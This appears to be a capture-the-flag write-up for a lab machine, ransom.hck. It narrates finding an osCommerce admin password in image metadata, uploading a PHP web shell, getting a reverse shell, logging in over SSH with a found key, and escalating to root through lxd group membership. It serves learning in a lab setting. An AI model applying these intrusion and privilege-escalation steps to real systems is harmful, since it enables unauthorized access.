As always I started with nmap port scan and nmap said there were some ports open along with the http and ssh. After some enumeration we found a way to exploit http service and gained user access to the machine. After the LinEnum.sh script I saw our user access could be misconfigured. I’ve seen similar question before so I thought I could capture the flag. Then I did some google search found a writeup about it, I did privilege escalation with that writeup and captured the flag.
Starting with nmap scan
It had some ports open, when I saw the http port open in CTFs I visit them with my browser. The website directed me to another address called
ransom.hck. My browser couldn’t find the server address due to there was no domain such
ransom.hck in domain name servers. Therefore, I add this domain to my computer’s hosts file manually.
Browsing the pages/directories
When I followed the redirection with my browser it redirected me to
ransom.hck/oscommerce address. We looked for vulnerabilities for osCommerce on the internet then we saw it had couple of vulnerabilities some of them were authanticated some of them were not. We tried to exploit osCommerce script without any user credentials but we failed.
After some time I wanted to look source code of root directory of the ransom.hck(I don’t know why haven’t tried it before) to check if we missed something. Yes, we totally missed something. When I did
curl -vvv http://ransom.hck I saw something strange, a strange filename commented out of the html source code.
The file was named
ransom.jpg, we instantly found that file on the website.
(The ransom.jpg file)
After that we discovered a string from ransom.jpg’s meta-data.
Continuing with osCommerce Arbitrary File Upload
The string was
12aN5oM. We tried connecting to machine via SSH by using this string for many combinations but again we failed that. After a while we discovered that string was the admin password of osCommerce script.
After I uploaded the php shell I wanted a reverse shell to my computer. This was an unnecessary step for this question.
Enumerating files to gain SSH access
We enumerated the machine and my team said “there is an interesting file” which was called
We tried to connect to the machine via SSH by using this RSA private key(We found the username earlier from
I usually run LinEnum.sh script when I had SSH connection, it’s one of my favourite scripts. After it has finished showed me the result. Script said “We’re a member of the (lxd) group - could possibly misuse these rights!”.
Privilege escalation with LXD/LXC
I’ve done something like this before but that was a Docker container related question and I thought I could done this question as well.
After some research on google I found a writeup about a Hack The Box machine.
I uploaded my linux container to the machine then I did something similar to that writeup, you may want to read it for this step.
Then with the following magical command I gained root privilege:
lxc exec mycontainer /bin/sh
After the privesc work it was easy to capture the flag.